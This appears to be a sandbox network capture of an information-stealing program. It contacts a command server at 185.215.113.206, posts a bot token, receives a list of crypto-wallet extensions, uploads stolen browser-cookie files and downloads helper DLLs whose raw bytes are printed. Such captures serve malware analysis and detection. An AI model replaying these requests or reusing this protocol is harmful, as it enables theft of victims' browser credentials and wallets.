Dec 8, 2024 13:31:19.550403118 CET	1236	IN	Data Raw: 63 47 56 76 61 32 4a 70 61 32 68 6d 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 46 79 64 47 6c 68 62 69 42 42 63 48 52 76 63 79 42 58 59 57 78 73 5a 58 52 38 5a 57 5a 69 5a 32 78 6e 62 32 5a 76 61 58 42 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d Data Ascii: cGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFR
Dec 8, 2024 13:31:19.550463915 CET	672	IN	Data Raw: 61 32 78 69 66 44 46 38 4d 48 77 77 66 45 4e 76 62 57 31 76 62 6b 74 6c 65 58 78 6a 61 47 64 6d 5a 57 5a 71 63 47 4e 76 59 6d 5a 69 62 6e 42 74 61 57 39 72 5a 6d 70 71 59 57 64 73 59 57 68 74 62 6d 52 6c 5a 48 77 78 66 44 42 38 4d 48 78 61 62 32 Data Ascii: a2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2ZuYmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnB
Dec 8, 2024 13:31:19.557069063 CET	1236	IN	Data Raw: 62 57 78 69 62 47 4e 76 5a 47 5a 76 59 6e 42 6b 63 47 56 6a 59 57 46 6b 5a 32 5a 69 59 32 64 6e 5a 6d 70 6d 62 6d 31 38 4d 58 77 77 66 44 42 38 52 6e 4a 76 62 6e 52 70 5a 58 49 67 56 32 46 73 62 47 56 30 66 47 74 77 63 47 5a 6b 61 57 6c 77 63 47 Data Ascii: bWxibGNvZGZvYnBkcGVjYWFkZ2ZiY2dnZmpmbm18MXwwfDB8RnJvbnRpZXIgV2FsbGV0fGtwcGZkaWlwcGhmY2NlbWNpZ25oaWZwamthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmt
Dec 8, 2024 13:31:19.557151079 CET	368	IN	Data Raw: 61 57 35 38 4d 58 77 77 66 44 42 38 55 32 46 6d 5a 56 42 68 62 43 42 58 59 57 78 73 5a 58 52 38 59 58 42 6c 62 6d 74 6d 59 6d 4a 77 62 57 68 70 61 47 56 6f 62 57 6c 6f 62 6d 52 74 62 57 4e 6b 59 57 35 68 59 32 39 73 62 6d 68 38 4d 58 77 77 66 44 Data Ascii: aW58MXwwfDB8U2FmZVBhbCBXYWxsZXR8YXBlbmtmYmJwbWhpaGVobWlobmRtbWNkYW5hY29sbmh8MXwwfDB8Qml0Z2V0IFdhbGxldHxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHxUT04gV2FsbGV0fG5waHBscGdvYWtoaGpjaGtraG1pZ2dha2lqbmtoZm5kfDF8MHwwfE15VG9uV2FsbGV0fGZsZGZ
Dec 8, 2024 13:31:19.559343100 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAEC Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 35 32 62 37 34 31 35 66 36 66 37 62 64 30 61 36 35 34 30 37 61 35 39 66 65 34 35 37 31 63 65 62 35 34 33 38 61 64 38 63 39 31 64 65 63 38 66 36 66 33 38 63 35 39 30 66 62 37 37 62 66 33 37 35 33 33 32 36 33 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 2d 2d 0d 0a Data Ascii: ------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="token"3b52b7415f6f7bd0a65407a59fe4571ceb5438ad8c91dec8f6f38c590fb77bf375332639------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="message"fplugins------KEBGHCBAEGDHIDGCBAEC--
Dec 8, 2024 13:31:20.003115892 CET	335	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:19 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Dec 8, 2024 13:31:20.026760101 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHCAECGIEBKJKEBGDHDA Host: 185.215.113.206 Content-Length: 7987 Connection: Keep-Alive Cache-Control: no-cache
Dec 8, 2024 13:31:20.026926994 CET	7987	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 35 32 62 37 Data Ascii: ------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="token"3b52b7415f6f7bd0a65407a59fe4571ceb5438ad8c91dec8f6f38c590fb77bf375332639------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Dec 8, 2024 13:31:21.000394106 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 8, 2024 13:31:21.280237913 CET	94	OUT	GET /68b591d6548ec281/sqlite3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 8, 2024 13:31:21.722534895 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:21 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Dec 8, 2024 13:31:21.722631931 CET	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49791	185.215.113.206	80	7368	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 13:31:30.947470903 CET	621	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJDGHIJDGCBAAAAAFIJD Host: 185.215.113.206 Content-Length: 419 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 35 32 62 37 34 31 35 66 36 66 37 62 64 30 61 36 35 34 30 37 61 35 39 66 65 34 35 37 31 63 65 62 35 34 33 38 61 64 38 63 39 31 64 65 63 38 66 36 66 33 38 63 35 39 30 66 62 37 37 62 66 33 37 35 33 33 32 36 33 39 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 [TRUNCATED] Data Ascii: ------HJDGHIJDGCBAAAAAFIJDContent-Disposition: form-data; name="token"3b52b7415f6f7bd0a65407a59fe4571ceb5438ad8c91dec8f6f38c590fb77bf375332639------HJDGHIJDGCBAAAAAFIJDContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------HJDGHIJDGCBAAAAAFIJDContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------HJDGHIJDGCBAAAAAFIJD--
Dec 8, 2024 13:31:32.798439980 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 8, 2024 13:31:32.905503035 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIJEGDAKEHJECAKEGDHJ Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 45 47 44 41 4b 45 48 4a 45 43 41 4b 45 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 35 32 62 37 34 31 35 66 36 66 37 62 64 30 61 36 35 34 30 37 61 35 39 66 65 34 35 37 31 63 65 62 35 34 33 38 61 64 38 63 39 31 64 65 63 38 66 36 66 33 38 63 35 39 30 66 62 37 37 62 66 33 37 35 33 33 32 36 33 39 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 45 47 44 41 4b 45 48 4a 45 43 41 4b 45 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 45 47 44 41 4b 45 48 4a 45 43 41 4b 45 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------GIJEGDAKEHJECAKEGDHJContent-Disposition: form-data; name="token"3b52b7415f6f7bd0a65407a59fe4571ceb5438ad8c91dec8f6f38c590fb77bf375332639------GIJEGDAKEHJECAKEGDHJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GIJEGDAKEHJECAKEGDHJContent-Disposition: form-data; name="file"------GIJEGDAKEHJECAKEGDHJ--
Dec 8, 2024 13:31:33.844189882 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:33 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49835	185.215.113.206	80	7368	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 13:31:45.526499033 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAEBFIIECBGCBGDHCAFC Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 35 32 62 37 34 31 35 66 36 66 37 62 64 30 61 36 35 34 30 37 61 35 39 66 65 34 35 37 31 63 65 62 35 34 33 38 61 64 38 63 39 31 64 65 63 38 66 36 66 33 38 63 35 39 30 66 62 37 37 62 66 33 37 35 33 33 32 36 33 39 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------BAEBFIIECBGCBGDHCAFCContent-Disposition: form-data; name="token"3b52b7415f6f7bd0a65407a59fe4571ceb5438ad8c91dec8f6f38c590fb77bf375332639------BAEBFIIECBGCBGDHCAFCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BAEBFIIECBGCBGDHCAFCContent-Disposition: form-data; name="file"------BAEBFIIECBGCBGDHCAFC--
Dec 8, 2024 13:31:47.356347084 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:46 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 8, 2024 13:31:47.795330048 CET	94	OUT	GET /68b591d6548ec281/freebl3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 8, 2024 13:31:48.240195036 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:48 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Dec 8, 2024 13:31:48.240209103 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b Data Ascii: UhOt8]h1]UWVEtu}UMt"0(h&40jVjjRQP?^_]USWVhO?t0
Dec 8, 2024 13:31:48.240223885 CET	1236	IN	Data Raw: 55 07 08 00 83 c4 08 eb ce cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 83 ec 58 89 4c 24 2c 8b 7d 1c a1 b4 30 0a 10 31 e8 89 44 24 50 c7 44 24 3c 10 00 00 00 83 ff 18 72 19 89 f8 83 e0 07 75 12 8d 47 f8 3b 45 14 76 14 68 03 e0 ff Data Ascii: UUSWVXL$,}01D$PD$<ruG;Evhh\|$,}uT$4D$0P\|OL$8PVS'D$@?@L$L$D$D$D$$
Dec 8, 2024 13:31:48.240251064 CET	672	IN	Data Raw: 55 89 e5 53 57 56 83 ec 24 8b 4d 1c 8b 75 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 7d 08 8d 59 f8 83 f9 10 75 32 8d 45 dc 8d 4d e0 6a 10 ff 75 18 6a 10 50 51 57 e8 f7 93 06 00 83 c4 18 89 c7 8d 75 e8 83 45 dc f8 c7 45 d8 00 00 00 00 85 ff 0f 85 b4 01 Data Ascii: USWV$Mu01E}Yu2EMjujPQWuEEC1;]vS{EE1uuSPVEPo9]SUYY)ZYEME]M)19D
Dec 8, 2024 13:31:48.240262032 CET	1236	IN	Data Raw: c7 47 08 00 00 00 00 89 47 04 8b 48 04 ff 15 00 80 0a 10 ff d1 89 07 be ff ff ff ff 85 c0 74 49 8b 55 10 89 f9 ff 75 18 ff 75 14 e8 40 00 00 00 83 c4 08 85 c0 74 30 8b 1f 85 db 74 2c 8b 47 04 8b 48 0c ff 15 00 80 0a 10 6a 01 53 ff d1 83 c4 08 eb Data Ascii: GGHtIUuu@t0t,GHjShv1^_[]USWVLU01E}Yt9vhC9Us[KSFHuWSFHE}j@PWS
Dec 8, 2024 13:31:48.240272045 CET	1236	IN	Data Raw: 57 56 8b 75 0c 8b 7d 10 8b 45 08 8b 18 8b 40 04 8b 48 14 ff 15 00 80 0a 10 57 56 53 ff d1 83 c4 0c 5e 5f 5b 5d c3 cc cc cc cc cc cc 55 89 e5 53 57 56 50 8b 4d 14 8b 7d 08 8b 47 04 39 08 76 17 68 05 e0 ff ff e8 b5 fa 07 00 83 c4 04 b8 ff ff ff ff Data Ascii: WVu}E@HWVS^_[]USWVPM}G9vhuHuVuSO;upISEGHpVSu7GHES]SV7GHuuSV1
Dec 8, 2024 13:31:48.240283966 CET	1236	IN	Data Raw: 56 ff 75 18 50 ff 75 10 e8 0b 00 00 00 83 c4 10 5e 5d c3 cc cc cc cc cc 55 89 e5 53 57 56 83 ec 34 89 4d f0 8b 45 14 89 45 d8 39 45 0c 73 17 68 03 e0 ff ff e8 f2 f5 07 00 83 c4 04 b8 ff ff ff ff e9 79 08 00 00 89 55 e4 8b 7d 10 8b 5d 08 8b 45 f0 Data Ascii: VuPu^]USWV4MEE9EshyU}]E}}aM}$7$7u2M$E}$7$7u]S2MQE}
Dec 8, 2024 13:31:48.240294933 CET	1236	IN	Data Raw: e8 66 0f 70 d2 e8 66 0f 62 ca 66 0f 6e 54 07 04 66 0f 60 d3 66 0f 61 d3 66 0f eb cf 66 0f 72 f4 17 66 0f fe e5 f3 0f 5b e4 66 0f 70 ea f5 66 0f f4 d4 66 0f 70 e4 f5 66 0f f4 e5 66 0f 70 d2 e8 66 0f 70 e4 e8 66 0f 62 d4 66 0f eb d6 83 c6 10 66 0f Data Ascii: fpfbfnTf`faffrf[fpffpffpfpfbff!~sMEMEUxEUMfEMUTFtFMUEM)ffo 1ffo f
Dec 8, 2024 13:31:48.240526915 CET	1236	IN	Data Raw: 55 f0 0f b6 04 02 c1 e0 10 09 c8 8b 4d e8 8b 55 ec 01 d1 83 c1 04 0f b6 c9 8b 55 f0 0f b6 14 0a 00 d3 0f b6 f3 8b 7d f0 8a 34 37 8b 7d f0 88 34 0f 8b 4d f0 88 14 31 8b 75 d8 00 d6 0f b6 ce 8b 55 f0 0f b6 14 0a c1 e2 18 09 c2 33 55 e0 8b 4d c4 8b Data Ascii: UMUU}47}4M1uU3UMEM}}Eu;uUM}Et}EPEE},7,7E@2
Dec 8, 2024 13:31:48.240537882 CET	1236	IN	Data Raw: f0 fe ff ff 8b 5d e4 11 d3 03 85 5c ff ff ff 89 45 d0 11 f3 89 5d e4 31 d9 8b 95 64 ff ff ff 31 c2 89 d0 0f a4 c8 10 0f ac ca 10 89 95 64 ff ff ff 8b 4d c4 01 d1 89 4d c4 11 c7 89 c3 89 7d bc 31 fe 8b 85 5c ff ff ff 31 c8 89 f1 0f a4 c1 01 89 4d Data Ascii: ]\E]1d1dMM}1\1M\tH@uHD4U`uU1]d1dMMMUU1u1tpH8}pLE]
Dec 8, 2024 13:31:48.250220060 CET	1236	IN	Data Raw: ca 89 4d dc 8b 4d d8 11 d9 89 4d d8 31 c8 89 f9 31 d1 89 c2 0f a4 ca 01 89 55 a4 0f a4 c1 01 89 4d 8c 8b 45 b8 03 85 38 ff ff ff 8b 4d f0 13 8d 14 ff ff ff 8b 5d ac 01 d8 89 45 b8 8b 95 7c ff ff ff 11 d1 89 4d f0 8b bd 78 ff ff ff 31 cf 8b 75 a8 Data Ascii: MMM11UME8M]E\|Mx1u1uEEMM11ut]Pu]M11Xx]]MM11\|}$E\]}
Dec 8, 2024 13:31:49.962236881 CET	94	OUT	GET /68b591d6548ec281/mozglue.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 8, 2024 13:31:50.405097008 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:50 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Dec 8, 2024 13:31:51.299155951 CET	95	OUT	GET /68b591d6548ec281/msvcp140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
